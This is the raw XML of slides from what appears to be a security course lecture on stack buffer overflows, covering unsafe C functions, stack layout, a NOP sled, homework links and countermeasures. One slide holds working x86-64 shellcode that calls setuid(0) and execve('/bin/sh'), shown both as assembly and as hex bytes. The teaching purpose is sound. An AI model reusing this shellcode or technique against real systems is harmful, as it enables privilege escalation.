            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[] );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1250"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>For simplicity,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”, NULL] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, which is an empty array []</a:t>
            </a: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dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>setreuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> are the *system calls* that the equivalent C library calls invoke</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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Will want to craft system calls in shell code, not library calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0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 marL="741363" indent="-2444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750"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" alt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Must not have *any* NULLs in assembly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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Terminates vulnerable copy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b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRP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None/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"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750"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" alt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Must be able to access data deterministically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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Must find a way to pass a pointer to string “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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>” to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altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> without any knowledge of addresses of data on target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Some issues to take care of…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0" y="2209800"/>
            <a:ext cx="4572000" cy="111569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400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="003300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int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 main( char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="003300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc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, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="003300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv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[] ) </a:t>
            </a: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{</a:t>
            </a:r>
            <a:b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  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char buffer[500</a:t>
            </a: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];</a:t>
            </a:r>
            <a:b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3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy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( buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="003300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv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[1] </a:t>
            </a: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);</a:t>
            </a:r>
            <a:b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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return 0</a:t>
            </a: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;</a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033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err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> example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55588" y="935038"/>
            <a:ext cx="8888412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0000" tIns="46800" rIns="90000" bIns="46800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66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/* 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setuid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(0) + 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execve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(/bin/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   -&gt; see /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usr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/include/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asm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/unistd_64.h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main(){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__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asm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rdi,%rdi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$0x69,%al"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“							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,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$0x68732f6e69622fff,%rbx;”		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shr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$0x8,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“					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"push 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rbx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rsp,%rdi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xorq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rax,%rax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rax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pushq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rdi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movq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%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rsp,%rsi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 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mov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$0x3b,%al; “				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syscall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; "						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);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*/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main() {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char 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shellcode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[] =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"\x48\x31\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xff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\xb0\x69\x0f\x05\x48\x31\xd2\x48\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xbb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\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xff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\x2f\x62"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"\x69\x6e\x2f\x73\x68\x48\xc1\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xeb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\x08\x53\x48\x89\xe7\x48\x31"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"\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";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(*(void (*)()) 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shellcode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)();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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+mn-e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2438400"/>
            <a:ext cx="3728906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Create “/bin/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sh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\0” */</a:t>
            </a:r>
          </a:p>
          <a:p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Push onto stack */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr 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Then get </a:t>
            </a:r>
            <a:r>
              <a:rPr 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rdi</a:t>
            </a:r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to point to it */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr 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endParaRPr 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Push null onto stack */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr 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Call </a:t>
            </a:r>
            <a:r>
              <a:rPr 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execve</a:t>
            </a:r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with /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr 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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr 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*/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0" y="1676400"/>
            <a:ext cx="3084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/* Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1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setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1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with ID=0 */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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Armed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> now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752475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396875" y="2206625"/>
            <a:ext cx="500062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Buffer[0..256]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5454650" y="2209800"/>
            <a:ext cx="12954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28682" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6797675" y="2209800"/>
            <a:ext cx="981075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Return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683" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7816850" y="2209800"/>
            <a:ext cx="11049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[stuff]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28684" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4371975" y="-952500"/>
            <a:ext cx="504825" cy="8505825"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 167857"/>
            </a:avLst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5" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3400425" y="3582987"/>
            <a:ext cx="26098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Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="20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8686" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6686550" y="3584575"/>
            <a:ext cx="1019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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28687" name="AutoShape 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="28686" idx="2"/>
            <a:endCxn id="28688" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4330701" y="1563688"/>
            <a:ext cx="82550" cy="5648325"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 376923"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="101520">
            <a:solidFill>
              <a:srgbClr val="003300"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28688" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1352550" y="4095750"/>
            <a:ext cx="390525" cy="33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8689" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6057900" y="3581400"/>
            <a:ext cx="5905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690" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7743825" y="3581400"/>
            <a:ext cx="63817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691" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8429625" y="3581400"/>
            <a:ext cx="628650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New</a:t>
            </a:r>
          </a:p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Addr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28692" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3581400"/>
            <a:ext cx="3057525" cy="76200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</a:rPr>
              <a:t>NOP Sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Line 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="396875" y="2044700"/>
            <a:ext cx="8369300" cy="1587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743200" y="1600200"/>
            <a:ext cx="37338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example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sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Implementation of Unix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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No way to specify limit on number of characters to read</a:t>
            </a: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endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1750"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Similar problems with other library functions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altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>,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strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>: Copy strings of arbitrary length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="750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altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>,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altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>,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sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, when given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%s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>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2133600"/>
            <a:ext cx="4038600" cy="26750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vulnerability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13716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33400" y="2362200"/>
            <a:ext cx="44196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small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!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24325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b="1" i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b="1" i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57800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0123456789012345678901234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409504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500" y="363337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echo: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410200" y="3637840"/>
            <a:ext cx="3147015" cy="762000"/>
            <a:chOff x="5867400" y="1143000"/>
            <a:chExt cx="3147015" cy="762000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6629400" y="1447800"/>
              <a:ext cx="0" cy="457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867400" y="1143000"/>
              <a:ext cx="31470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Allocate local variables</a:t>
              </a:r>
              <a:endPara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65150" y="1397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4006e8:	48 83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4006f6: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4500" y="990600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call_echo</a:t>
            </a:r>
            <a:r>
              <a:rPr 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447800" y="2514600"/>
            <a:ext cx="5245347" cy="795754"/>
            <a:chOff x="5867400" y="685800"/>
            <a:chExt cx="5245347" cy="795754"/>
          </a:xfrm>
        </p:grpSpPr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172200" y="685800"/>
              <a:ext cx="304800" cy="4572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867400" y="1143000"/>
              <a:ext cx="52453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Return address pushed onto stack on </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600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callq</a:t>
              </a:r>
              <a:endPara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$0x18,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call_echo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(8 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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  <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  $0x18,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44196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small! */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2514600" y="3886201"/>
            <a:ext cx="3886200" cy="17525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(8 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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00206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20 bytes unused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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32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f6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7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05681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2" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="31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$0x18,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(8 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>20 bytes unused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4006f6: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call_echo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</a:rPr>
                <a:t>f6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b="1" i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b="1" i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6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7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9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10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but did not corrupt state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2613562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Example #1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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</a:t>
            </a:r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%rdi,%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ro-RO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400557:  retq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400544: callq  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400550 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&lt;mult2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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK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/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5169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$0x18,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latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(8 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1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20 bytes unused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4006f6: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call_echo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b="1" i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b="1" i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5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7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9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+mn-lt"/>
              </a:rPr>
              <a:t>Overflowed buffer and corrupted return pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10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chemeClr val="accent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06248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$0x18,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latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(8 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1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20 bytes unused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. . .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call_echo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b="1" i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b="1" i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5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7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9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10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b="1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53105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Buffer Overflow Stack Example #3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latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1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1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(8 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1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</a:rPr>
              <a:t>rsp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for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>call_echo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</a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>20 bytes unused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305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400600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400603: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400606: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shr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40060a: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add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40060d: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sar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400610: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jne    400614</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK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400612: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pop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400613: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retq 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register_tm_clones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7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9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59187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“Returns” to unrelated code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Eventually executes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retq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean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back to 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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 67"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="541337" y="2819400"/>
            <a:ext cx="1789113" cy="304800"/>
            <a:chOff x="2384959" y="2811289"/>
            <a:chExt cx="1789113" cy="304800"/>
          </a:xfrm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84959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34222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206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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00206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0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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0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1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b="1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74790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Homework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+mn-lt"/>
              </a:rPr>
              <a:t>Stacksmash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> binary: Overflow buffer to hijack execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060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+mn-lt"/>
              </a:rPr>
              <a:t>Practice 32-bit IA32 (must create account) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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200400"/>
            <a:ext cx="8229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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://picoctf.com/problem-static/binary/Overflow1/overflow1.html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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://picoctf.com/problem-static/binary/Overflow2/overflow2.html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65125"/>
            <a:ext cx="77724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mtClean="0"/>
              <a:t>Counter-measures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1) Better code (Practice Problem)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/>
              <a:t>Use library routines that limit string lengths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(char *,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, FILE*)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> instead of 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gets(char*)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strlcpy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(char*, char*,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altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> instead of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(char*,char*) =&gt;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8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 *.c</a:t>
            </a:r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sz="2000" dirty="0" smtClean="0"/>
          </a:p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000" dirty="0" smtClean="0"/>
              <a:t>Use length delimiters with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/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%ns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> is a suitable integer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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343400" y="2514600"/>
            <a:ext cx="3962400" cy="95154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1" hangingPunct="1"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[]) {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[4];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[1] );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343400" y="3505200"/>
            <a:ext cx="3962400" cy="11669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1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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[]) {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[4];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[1], 3 );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14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[3] = \0;</a:t>
            </a:r>
            <a:b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1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2514600"/>
            <a:ext cx="3810000" cy="1382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small! */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gets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0" y="3886200"/>
            <a:ext cx="3810000" cy="1382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() {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[4];  /* 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Too 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small! */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867400" y="4495800"/>
            <a:ext cx="2362200" cy="11669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echo() {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];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scanf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(“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s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”,buf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867400" y="5691014"/>
            <a:ext cx="2438400" cy="11669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void echo() {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4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[4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];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scanf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(“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MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>%3s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”,buf);</a:t>
            </a:r>
            <a:b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4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4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);</a:t>
            </a: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/>
            </a:r>
            <a:b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sz="14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Practice problem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List three problems with the following code</a:t>
            </a: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  <a:p>
            <a:pPr marL="860425" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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Vulnerable gets allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> to be overrun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="860425" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> does not allocate room for NULL terminator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="860425" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> can overrun heap where result points to</a:t>
            </a:r>
          </a:p>
          <a:p>
